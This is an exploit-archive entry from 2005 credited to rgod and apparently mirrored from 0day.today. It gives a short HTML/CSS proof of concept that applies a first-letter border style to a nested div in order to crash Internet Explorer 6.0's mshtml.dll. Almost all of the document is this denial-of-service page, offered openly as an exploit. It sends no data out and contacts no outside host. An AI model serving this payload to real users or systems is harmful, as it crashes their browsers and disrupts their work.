id: 6080
date: 12/29/2005
title: MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit
author: rgod
cves: 

===================================================================
MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit
===================================================================



<!--
-------------------------------------------------------------------------------------------
Internet Explorer Version 6.0.2900.2180.xpsp_sp2 mshtml.dll <div> Denial of Service exploit
by rgod

-------------------------------------------------------------------------------------------
-->
<head>
<style><!--
#page div p:first-child:first-letter {
   border-bottom: 2px ridge #F5DEB3;
}
//-->
</style>
</head>
<body><div id="page"><div><p><strong>suntzu</strong></p>



#  0day.today [2023-03-22]  #